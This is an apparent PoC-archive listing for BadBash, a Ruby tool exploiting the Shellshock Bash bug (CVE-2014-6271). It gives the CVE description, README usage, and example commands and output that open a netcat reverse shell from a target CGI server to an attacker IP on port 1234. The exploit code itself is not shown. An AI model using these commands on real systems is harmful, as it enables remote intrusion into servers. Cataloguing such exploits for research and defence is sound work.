Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
https://github.com/securusglobal/BadBash
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
CVE-2014-6271 (ShellShock) RCE PoC tool
Readme
BadBash
=======

CVE-2014-6271 (ShellShock) RCE PoC tool 

=======
BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234.

Developer : Andy Yang 
Version : 0.1.0 
License : GPLv3

Orginal github project : https://github.com/RainMak3r/Rainstorm

================================================================================================
RainMak3r@Could:~/Desktop# ruby BadBash.rb  -h

BadBash - CVE-2014-6271 RCE tool by Andy Yang
Basic version only checks for HTTP site
Basic version only provides netcat reverse shell on port 1234


EXAMPLE USAGE:

     ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
     ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
    -t, --Target CGI path            Full path of CGI page
    -d, --Destination IP             Your IP address that listen to an inbound connection
    -h, --help                       Display help

================================================================================================
Example of usage.
================================================================================================
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info]     Checking if the target is vulnerable........

[Info]     This may take up to 10 seconds........

[Info]     Target is vulnerable!!!

[Info]     Please use NC to listen on port 1234 for reverse shell..........

[Info]     Exploiting for a reverse shell to connect 172.16.189.1:1234 via netcat ..........
File Snapshot

 [4.0K]  /data/pocs/fe82d479180629da939d9303fa49d5212972c526
├── [3.8K]  BadBash.rb
├── [ 34K]  LICENSE
└── [1.6K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →